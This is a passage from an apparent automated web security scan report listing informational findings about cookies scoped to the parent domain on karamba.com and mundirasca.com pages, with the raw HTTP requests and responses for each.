Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.123. http://www.karamba.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.124. http://www.karamba.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

11.125. http://www.karamba.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.126. http://www.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=C45936DC0F217E7879AFCCA9E15735D8&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 11:42:44 GMT; path=/
UniqueVisitorID=C45936DC0F217E7879AFCCA9E15735D8; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: www.karamba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:42:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hnpray55xak3o2u2au4qpubt; path=/; HttpOnly
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=C45936DC0F217E7879AFCCA9E15735D8&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 11:42:44 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: UniqueVisitorID=C45936DC0F217E7879AFCCA9E15735D8; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Vary: Accept-Encoding
Content-Length: 44654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.127. http://www.karamba.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

11.128. http://www.karamba.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.129. http://www.karamba.com/Privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Privacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Privacy.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.130. http://www.karamba.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.131. http://www.karamba.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.132. http://www.karamba.com/Sitemap.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Sitemap.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

11.133. http://www.karamba.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 108541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.134. http://www.karamba.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.135. http://www.karamba.com/click/Karamba.com/ENG/Home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/click/Karamba.com/ENG/Home/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/Karamba.com/ENG/Home/ HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.136. http://www.mundirasca.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
